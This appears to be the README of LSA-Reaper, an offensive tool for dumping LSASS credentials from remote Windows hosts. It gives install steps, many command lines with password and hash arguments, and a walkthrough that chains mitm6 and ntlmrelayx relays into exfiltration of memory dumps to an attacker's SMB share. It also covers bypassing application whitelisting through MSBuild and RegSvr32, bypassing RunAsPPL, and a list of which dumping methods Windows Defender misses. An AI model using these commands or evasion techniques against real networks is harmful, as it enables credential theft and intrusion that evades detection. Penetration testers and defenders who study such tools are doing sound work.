The MSBuild payload and any ending with mdwd will cause explorer to hang indefinatly if the Windows Defender security intelligence is on 1.397.814.0 and a few versions before it (Microsoft made Defender into a DOS) on the latest version it appears to be fixed (1.393.939.0 or newer). This does not seem to affect any of the mdwdpss payloads.
I recommend using this tool in a virtual Python environment due to possible dependency conflicts with other popular tools you can find how to set that up here.
LSA-Reaper is a command line remote LSA dumping tool that uses Impacket's wmiexec, smbexec, or atexec. Bypassing Windows Application Whitelisting through multiple techniques such as MSBuild, RegSvr32, and sideloading a DLL through calc.exe. LSA-Reaper can even bypass the RunAsPPL flag for LSASS.
Usage with Impacket's ntlmrelayx
Forta for making awesome open source tools.
Marantral for being awesome and helping with MsBuild and RegSvr32 payloads!
itm4n made the RunAsPPL bypass that is used.
Inf0secRabbit made the modified mdwd functionality that is used.
GeneralTesler made the RtlCreateProcessReflection payload that I modified.
These are all dumping methods that I have explored a ❌ indicates that Windows Defender detects and blocks while a ✔️ indicates the method works
comsvcs.dll ❌
MiniDumpWriteDump ❌✔️ (might be causing explorer to hang?)
MiniDumpWriteDump + PSSCaptureSnapShot ✔️
MiniDumpWriteDump + RtlCreateProcessReflection ✔️
SQLDumper.exe ❌
Procdump.exe ❌
Task Manager ❌✔️ (Sometimes works you just need to manually copy the dmp file to save it from deletion)
Linux
Impacket
python3 pypykatz
python3 netifaces
python3 python-nmap
python3 Pebble
Samba
mono-complete
mingw-w64
python3-apt
sudo apt-get install samba
sudo apt-get install mono-complete
sudo apt-get install python3-apt
sudo apt-get install mingw-w64
git clone https://github.com/samiam1086/LSA-Reaper.git
cd LSA-Reaper
sudo python3 -m pip install -r requirements.txt
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
or
git clone https://github.com/samiam1086/LSA-Reaper.git
cd LSA-Reaper
sudo sh setup.sh
LSA-Reaper will begin by ping sweeping all provided IPs or IP ranges for alive hosts. LSA-Reaper will then create a SMB share with a random username and password that will act as the exfiltration point. LSA-Reaper will then execute the net use command on the victim machine via wmiexec or atexec to make the victim machine mount the share as a network drive and then execute msbuild, regsvr32, calc.exe, or an EXE file to execute the payload which will dump LSA and save it to the mounted SMB share.
sudo python3 lsa-reaper.py
ALL of these command arguments are interchangeable
sudo python3 lsa-reaper.py domain/user:'Password'@ip
sudo python3 lsa-reaper.py testdomain/testuser:'P@ssw0rd!'@10.0.0.100
sudo python3 lsa-reaper.py testdomain/testuser:'P@ssw0rd!'@10.0.0.0/24
sudo python3 lsa-reaper.py testdomain/testuser:'P@ssw0rd!'@10.0.0.10-200
sudo python3 lsa-reaper.py testdomain/testuser:'P@ssw0rd!'@ipList.txt
sudo python3 lsa-reaper.py testdomain/testuser:'P@ssw0rd!'@/absolute/path/to/file/ipList.txt
sudo python3 lsa-reaper.py testdomain/testuser@10.0.0.100
sudo python3 lsa-reaper.py -hashes 'LMHASH:NTHASH' testdomain/testuser@10.0.0.100
sudo python3 lsa-reaper.py -ip local_ip testdomain/testuser@10.0.0.100
sudo python3 lsa-reaper.py -drive A testdomain/testuser@10.0.0.100
sudo python3 lsa-reaper.py -localauth localuser@10.0.0.100
sudo python3 lsa-reaper.py -ip eth0 testdomain/testuser:'P@ssw0rd!'@10.0.0.100 -payload regsvr32 -method smbexec -ap
First things first you need to run mitm6 and ntlmrelayx
Once these are running you should begin to receive connections. These can be checked using the socks command within ntlmrelayx. Once you have gotten a connection with Admin Status of True you are good to get the ball rolling.
With this connection we no longer need ntlmrelayx gathering relays so we can run the command stopservers
Now we need to modify our proxychains.conf in /etc/ (It may be called proxychains4.conf). This is because the -socks argument on ntlmrelayx starts a socks4 server on local port 1080.
With this set and saved we can move to LSA-Reaper. NOTE you can skip all of this by using -relayx and -oe within lsa-reaper.py
Run smbexec-modified.py through proxychains. (Note that the domain is not the fqdn which should be testenvironment.local for our example. It MUST be what ntlmrelayx puts for the domain in the socks connections)
When prompted for a password simply press enter.
Now run the command net use to view if any network drives are mounted on the target server. (This is so we can change the drive letter LSA-Reaper uses if the default of Q: is already in use)
Now startup LSA-Reaper with the -oe flag
sudo python3 lsa-reaper.py -oe -ap
Now that LSA-Reaper is running we can begin to execute each command from the large payload individually, (This is a limitation of smbexec and youll lose your shell if you try to run them all at once)
Now you can press enter to end LSA-Reaper and navigate to the loot directory within the LSA-Reaper folder and then into the newest loot file. All that is left to do is use pypykatz to dump the DMP file. (Note this step is not required if you use the -ap flag)
pypykatz is giving an error oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto
This is due to oscrypto which is a python module not recognizing a newer version of openssl and a solution can be found here its just a simple regex issue. Removing and reinstalling oscrypto did not fix the issue for me I had to manually edit the files shown in that link.